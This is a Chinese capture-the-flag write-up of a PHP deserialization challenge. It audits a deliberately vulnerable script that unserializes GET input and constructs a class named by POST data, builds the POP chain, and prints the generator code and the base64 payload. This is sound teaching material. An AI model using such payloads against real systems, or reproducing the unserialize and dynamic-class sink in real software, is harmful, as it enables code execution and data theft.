第四周3

  1. 打开环境，PHP 代码映入眼帘

    <?php
    // Challenge preamble: all PHP warnings/notices are suppressed, and the file prints its own
    // source so the visitor can audit it. Nothing here touches request data yet.
    error_reporting(0);
    highlight_file(__FILE__);
    // flag.php
    /**
     * A staff member. name and rank are public; salary is private but, like every
     * property, is still included when the object is serialize()d.
     */
    class teacher
    {
        public $name;
        public $rank;
        private $salary;

        /**
         * @param mixed $name
         * @param mixed $rank
         * @param mixed $salary defaults to 10000 when the caller omits it
         */
        public function __construct($name, $rank, $salary = 10000)
        {
            [$this->name, $this->rank, $this->salary] = [$name, $rank, $salary];
        }
    }
    /**
     * A room with a name and a leader (expected to be a teacher-like object
     * exposing name and rank).
     */
    class classroom
    {
        public $name;
        public $leader;

        /**
         * @param mixed $name
         * @param mixed $leader object whose name/rank are inspected by hahaha()
         */
        public function __construct($name, $leader)
        {
            $this->name = $name;
            $this->leader = $leader;
        }

        /**
         * True only when this room is 'one class' and its leader is named 'ing'
         * with rank 'department'. Comparisons are loose (==), as in the original,
         * and short-circuit left to right so leader is only read when the room
         * name already matches.
         *
         * @return bool
         */
        public function hahaha()
        {
            $leader = $this->leader;
            $isTargetRoom = $this->name == 'one class'
                && $leader->name == 'ing'
                && $leader->rank == 'department';

            return $isTargetRoom;
        }
    }
    /**
     * Root object of the challenge's object graph. Its __wakeup() is what makes
     * unserialize() of attacker-supplied data reach IPO().
     */
    class school
    {
        public $department;
        public $headmaster;

        /**
         * @param mixed $department object expected to provide hahaha()
         * @param mixed $ceo        stored as headmaster
         */
        public function __construct($department, $ceo)
        {
            $this->department = $department;
            $this->headmaster = $ceo;
        }

        /**
         * Sink exercised by this challenge: when headmaster loosely equals 'ong',
         * a class named by POST 'a' is instantiated with POST 'b' as its constructor
         * argument and echoed. Deriving a class name from request input lets any
         * loadable class (including PHP native classes) be constructed; production
         * code must never do this.
         */
        public function IPO()
        {
            if ($this->headmaster != 'ong') {
                return;
            }

            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }

        /**
         * Invoked automatically by unserialize(); the department->hahaha() gate
         * is the condition the POP chain has to satisfy to reach IPO().
         */
        public function __wakeup()
        {
            if (!$this->department->hahaha()) {
                return;
            }

            $this->IPO();
        }
    }
    if(isset($_GET['d'])){
    // Entry point of the chain: base64-decoded, attacker-controlled GET data goes straight
    // into unserialize(), which triggers school::__wakeup() on the reconstructed object graph.
    // The root cause is untrusted input reaching unserialize(); json_decode() or an
    // allowed_classes whitelist would remove the vector.
    unserialize(base64_decode($_GET['d']));
    }
    ?>
  2. 代码审计：先看危险点

    echo new $_POST['a']($_POST['b']);
    这里可以利用原生类进行注入

    再看魔术方法 __wakeup，它在反序列化时会自动触发

  3. 想办法构造 POP 链
    反序列化时会自动触发 __wakeup 方法，我们需要让：

    if($this->department->hahaha())  
    返回true

    因此我们要调用 classroom 类中的 hahaha 方法：

    if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department')
    让该条件返回 false 即可

    我们需要用到 teacher 类，让其 name=ing、rank=department 即可；同时 school 的 headmaster 需要等于 ong，才能进入 IPO()

  4. 写代码:

    <?php
    // These three lines are carried over from the challenge source above; they do not
    // affect the serialized payload generated below.
    error_reporting(0);
    highlight_file(__FILE__);
    // flag.php
    /**
     * Payload stand-in for the challenge's teacher class: only the two public
     * properties hahaha() inspects are declared, pre-set to the expected values.
     * Property order is kept because it determines the serialize() output.
     */
    class teacher
    {
        public $name = 'ing';
        public $rank = 'department';
    }

    /**
     * Payload stand-in for classroom: name is fixed to the value hahaha() checks,
     * leader is filled in by the generator script with a teacher instance.
     */
    class classroom
    {
        public $name = 'one class';
        public $leader;
    }

    /**
     * Payload stand-in for school: headmaster is pre-set so IPO()'s check passes,
     * department is assigned a classroom by the generator script.
     */
    class school
    {
        public $department;
        public $headmaster = 'ong';
    }

    // Wire the object graph school -> classroom -> teacher, then emit it in the
    // base64(serialize(...)) form the challenge's GET parameter expects.
    $school = new school();
    $room = new classroom();
    $head = new teacher();

    $school->department = $room;
    $room->leader = $head;

    echo base64_encode(serialize($school));
    ?>

    结果:
    Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjoyOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO319czoxMDoiaGVhZG1hc3RlciI7czozOiJvbmciO30=

    成功获得flag

5. 总结：
这个题目主要考察原生类利用，
其余部分就是常规的反序列化题目。